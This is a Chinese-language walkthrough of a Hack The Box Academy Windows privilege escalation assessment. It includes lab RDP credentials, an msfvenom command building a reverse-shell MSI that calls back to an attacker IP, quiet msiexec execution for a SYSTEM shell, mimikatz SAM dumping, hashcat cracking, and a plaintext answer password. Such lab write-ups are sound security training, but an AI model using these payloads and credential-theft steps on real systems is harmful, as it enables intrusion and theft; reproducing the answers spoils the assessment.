HTB--Windows Privilege Escalation Skills Assessment

RDP登陆

xfreerdp3 /u:'htb-student' /p:'HTB_@cademy_stdnt!' /v:10.129.229.44  +clipboard /drive:kali,/home/kali/Desktop

启动粘贴复制和挂载本地利用工具

这里我们使用Sharp进行枚举在这里插入图片描述
利用点。

AlwaysInstallElevated 可用于 SYSTEM 权限提权

Windows 系统注册表的两个键：

HKCU\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

HKLM\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

都设置为 1，意味着系统允许使用提升权限（SYSTEM 权限）安装 .msi 安装包。

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.95 lport=443 -f msi > aie.msi

在这里插入图片描述
然后上传到桌面
执行MSI安装包

msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart

在这里插入图片描述
成功拿到system shell

拿到flag

第三个问题是说该系统中存在1个禁用的本地管理员用户，密码强度较弱，可能被用于访问网络中的其他系统。

上传mimikatz.exe，利用

lsadump::sam

在这里插入图片描述
发现一个wksadmin的用户，进行hashcat

hascat -m 1000 ./hash ./rockyou.txt

在这里插入图片描述
成功

然后第一个问题是，让我们
查找iamtheadministrator域管理员账户中遗留的明文凭据。
通过WinPEAS枚举到密码
在这里插入图片描述
C:\Windows\Panther\Unattend.xml
答案为 Inl@n3fr3ight_sup3rAdm1n!